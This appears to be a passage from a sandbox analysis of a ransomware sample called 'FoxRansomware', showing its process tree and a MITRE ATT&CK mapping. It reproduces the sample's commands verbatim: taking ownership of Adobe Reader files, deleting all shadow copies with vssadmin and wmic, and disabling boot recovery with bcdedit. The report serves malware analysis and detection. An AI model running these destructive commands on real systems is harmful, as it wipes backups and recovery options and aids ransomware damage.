C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:6028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_browser.gif" -nobanner3⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "review_browser.gif" -nobanner4⤵PID:5984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:6072
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:2736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵PID:2676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tl.gif" -nobanner3⤵PID:4956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "tl.gif" -nobanner4⤵PID:2632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:2908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:4364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
PID:2648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "Identity-V" -nobanner3⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "Identity-V" -nobanner4⤵PID:2492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:5016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:4328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵PID:2432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:5104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:4336
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:1920
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:4400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵
- Modifies file permissions
PID:1708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:2460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:3380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:1664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:2780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt55.ths" -nobanner3⤵PID:3444
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "brt55.ths" -nobanner4⤵PID:3432
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {BB268B7E-7B08-4EE7-A44C-7390BDAA937C} S-1-5-21-2610426812-2871295383-373749122-1000:UEITMFAB\Admin:Interactive:[1]1⤵PID:3780
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\jBIuzzaK.bat"2⤵PID:1632
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:5756
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5848
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:5892
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:4188
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3216
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Indicator Removal (2)
- File Deletion (2)
- Modify Registry (2)
Downloads